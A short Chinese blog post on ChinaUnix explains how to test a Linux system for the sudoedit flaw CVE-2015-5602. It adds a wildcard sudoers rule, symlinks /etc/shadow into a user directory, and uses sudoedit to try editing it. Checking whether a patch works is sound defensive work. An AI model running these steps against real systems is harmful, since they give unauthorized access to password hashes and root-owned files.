如何检测cve-2015-5602漏洞-wgh1688-ChinaUnix博客

Chinaunix首页 | 论坛 | 博客

王光辉的博客

首页　| 　博文目录　| 　关于我

博客访问： 434457
博文数量： 99
博客积分： 65
博客等级：民兵
技术积分： 1012
用户组：普通用户
注册时间： 2012-04-20 16:30

个人简介

linux kernel 工程师

文章分类

全部博文（99）

gcc（1）
Linux（4）

shell（2）
Grub（1）
linux FS（13）
C（2）
openstack（6）
security（1）
WindRiver L（12）

wr8（4）

build（1）

sysroot（2）

WRLinux 1.4（4）
grsecurity（8）

ASLR（7）
yocto（1）

tools（1）
linux drive（7）

usb（1）

gpio（2）

I2C（4）
linux netwo（22）

socket（1）

transimit（11）

下半部（3）

non NAPI（2）

NAPI（3）
linux kerne（19）

mm（4）

workqueue（2）

bottom half（4）

irq（7）
未分配的博文（2）

文章存档

2018年（5）

2017年（12）

2016年（27）

2015年（10）

2014年（43）

2012年（2）

我的朋友

fireaxe

最近访客

推荐博文

相关博文

如何检测cve-2015-5602漏洞

分类： LINUX

2016-03-10 16:24:58

1. 添加一个普通用户并设置用户密码
useradd wgh
passwd wgh

2. 在/etc/sudoers中添加下面一句话
wgh ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt

3. ssh 登录
ssh wgh@xx.xx.xx.xx
mkdir /home/wgh/newdir

ln -s /etc/shadow /home/wgh/newdir/test.txt

4. sudoedit /home/wgh/newdir/test.txt
发现可以修改/etc/shadow文件，则证明存在cve-2015-5602漏洞是存在的。
打上补丁后，如果发现/etc/shadow不可以修改了，则证明漏斗已经被修复。

阅读(1269) | 评论(0) | 转发(0) |

0

上一篇：SCHED_OTHER,SCHED_FIFO,SCHED_RR

下一篇：mprotect笔记

给主人留下些什么吧！~~

关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们